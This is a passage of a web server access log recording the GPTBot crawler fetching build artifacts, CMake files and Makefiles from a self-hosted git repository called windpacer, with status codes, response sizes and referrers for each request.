AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:14:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 9890] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:14:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 22117] [Gzip 11.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21643] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 9893] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:14:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 4613369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:14:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21642] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:14:58:03 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:14:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 10370] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:14:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10919] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:14:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10919] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:14:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10917] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:14:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10920] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:14:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21646] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 10362] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:14:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:14:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:14:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10941] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:14:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10942] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:14:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14308] [Gzip 8.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73550] [Gzip 20.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21808] [Gzip 12.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23987] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10942] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:14:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73568] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10941] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:14:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14329] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9931] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14329] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10941] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:14:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10941] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:14:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10916] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9911] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73568] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 